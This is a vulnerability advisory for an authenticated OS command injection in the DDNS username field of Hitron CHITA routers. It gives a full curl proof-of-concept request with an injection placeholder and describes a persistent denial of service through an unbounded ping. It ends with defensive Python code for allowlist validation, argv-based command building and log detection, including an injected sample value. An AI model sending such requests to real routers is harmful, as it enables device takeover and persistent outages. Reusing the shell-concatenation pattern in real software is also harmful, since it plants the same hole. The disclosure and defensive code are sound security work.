CVE-2022-25017: Hitron CHITA OS Command Injection (UPC Branded)
Hitron CHITA 7.2.2.0.3b6-CD devices contain a command injection vulnerability via the Device/DDNS ddnsUsername field.
Hitron CHITA OS Command Injection (UPC Branded)
# Exploit Title: Hitron CHITA OS Command Injection to DoS
# Software: Hitron Technologies CHITA Router Firmware (UPC branded)
# Version: 7.2.2.0.3b6-CD
# Author: `zaeek` (GBTI SA)
# CVE: TBA
# CWE: CWE-77 | CWE-400
# Date: 15.04.2021
# CVSSv3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
Summary: A command injection vulnerability in the Hitron CHITA router allows execution of OS commands. The injection vector resides in the dynamic DNS ("dyndns") service configuration logic.
Due to improper sanitization of user-supplied data, additional OS shell syntax can be appended to the expected value using a semicolon. To exploit this vulnerability, the attacker must be authenticated for web access.
Additionally, it is possible to cause a Denial of Service by injecting a command that is not bounded by any argument (such as `ping` without a `-c` count), rendering the router software unstable and, in the end, unable to handle HTTP requests to the web panel.
Even after a router restart, the injected command is started again during router startup, leaving the router unusable until a hard factory reset.
The Denial of Service case requires deeper testing, because of the limited time we were given to test it and the lack of a second router to confirm reproducibility.
PoC:
curl 'http://192.168.0.1/1/Device/DDNS' \
-H 'User-Agent: Mozilla/5.0 Firefox/85.0' \
-H 'Accept: application/json, text/javascript, */*; q=0.01' \
-H 'Accept-Language: en-US,en;q=0.5' \
--compressed \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'X-HTTP-Method-Override: PUT' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Origin: http://192.168.0.1' \
-H 'DNT: 1' \
-H 'Authorization: Basic YWRtaW46YWNldHlsb2Nob2xpbmE=' \
-H 'Connection: keep-alive' -H 'Referer: http://192.168.0.1/webpages/index.html' \
-H 'Cookie: sessionindex=0&userid=e9JwY6BG6rPLnFXUM1mV6gK5Zxq7ND4Z; sessionToken=1586484992; SID=3920641792; preSession=nMQLZPa3pyBqbTvFmg7Eddn1QdxDX9n6; modelname=CHITA; LANG_COOKIE=en_US; isEdit=1; isEdit1=0; isEdit2=0; isEdit3=0; PHPSESSID=805d894df5e7cc7d3a39eecee5ca3824' \
-H 'Pragma: no-cache' \
-H 'Cache-Control: no-cache' \
--data-raw 'model=%7B%22errCode%22%3A%22000%22%2C%22errMsg%22%3A%22%22%2C%22ddnsOnOff%22%3A%22ON%22%2C%22ddnsSrvProvider%22%3A1%2C%22ddnsUsername%22%3A%22d[**INJECT CMD WITH SEMICOLON**]d%22%2C%22ddnsPassword%22%3A%22a%22%2C%22ddnsHostnames%22%3A%22asdasd.zapto.org%22%2C%22ddnsUpdateInterval%22%3A%22604800%22%2C%22id%22%3A%221%22%7D&csrf=1lomnjjnqtc00.771727mgis8w&_method=PUT'
In the above curl example, the OS command injection vulnerability allows execution of local system binaries by replacing the `ddnsUsername` parameter value with, or concatenating it with, a direct OS command.
The injected command is executed, most likely with root privileges. If the injected command never terminates (such as `ping` without a `-c` count), it causes a denial of service, because the underlying DDNS handler that runs it never finishes.
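As an added defensive example (not part of the original advisory or Hitron's firmware): the form body the PoC sends is decoded, the `ddnsUsername` value is checked against an allowlist, and the updater command is built as an argv list instead of a shell string, so a semicolon can never start a second command. The `ddns-update` binary name, the allowlist pattern and the sample bodies are assumptions constructed for this example.

```python
import json
import re
from urllib.parse import parse_qs

# Assumed allowlist for DDNS account names: letters, digits and a few
# punctuation characters providers accept. Shell metacharacters such as
# ';', '|', '&', '$', backticks and quotes are excluded by construction.
SAFE_USERNAME = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def parse_ddns_request(body: str) -> dict:
    """Decode the body the PoC sends: model=<urlencoded JSON>&csrf=...&_method=PUT."""
    fields = parse_qs(body, keep_blank_values=True)
    return json.loads(fields["model"][0])


def check_ddns_username(username: str) -> bool:
    """True only if the value is safe to hand to the DDNS updater."""
    return SAFE_USERNAME.fullmatch(username) is not None


def vulnerable_shell_line(model: dict) -> str:
    """The flawed pattern: string concatenation for a shell. A value such as
    'd;id;d' turns into two commands once a shell parses this line."""
    return "ddns-update --user " + model["ddnsUsername"] + " --host " + model["ddnsHostnames"]


def build_update_argv(model: dict) -> list:
    """Hardened form: validate first, then pass the value as ONE argv element
    (run with subprocess.run(argv) / execve, never through a shell)."""
    user = model["ddnsUsername"]
    if not check_ddns_username(user):
        raise ValueError("ddnsUsername contains characters outside the allowlist")
    # 'ddns-update' is a placeholder; the real CHITA updater binary is not known.
    return ["ddns-update", "--user", user, "--host", model["ddnsHostnames"]]


def audit_body(body: str) -> bool:
    """Detection helper for web-server request logs: True when the submitted
    ddnsUsername falls outside the allowlist (i.e. looks like an injection)."""
    return not check_ddns_username(parse_ddns_request(body)["ddnsUsername"])


# Constructed sample bodies: a benign update and one carrying a semicolon.
BENIGN_BODY = ("model=%7B%22ddnsOnOff%22%3A%22ON%22%2C%22ddnsUsername%22%3A%22dyn.user%22"
               "%2C%22ddnsHostnames%22%3A%22example.zapto.org%22%7D&csrf=x&_method=PUT")
INJECTED_BODY = ("model=%7B%22ddnsOnOff%22%3A%22ON%22%2C%22ddnsUsername%22%3A%22d%3Bid%3Bd%22"
                 "%2C%22ddnsHostnames%22%3A%22example.zapto.org%22%7D&csrf=x&_method=PUT")
```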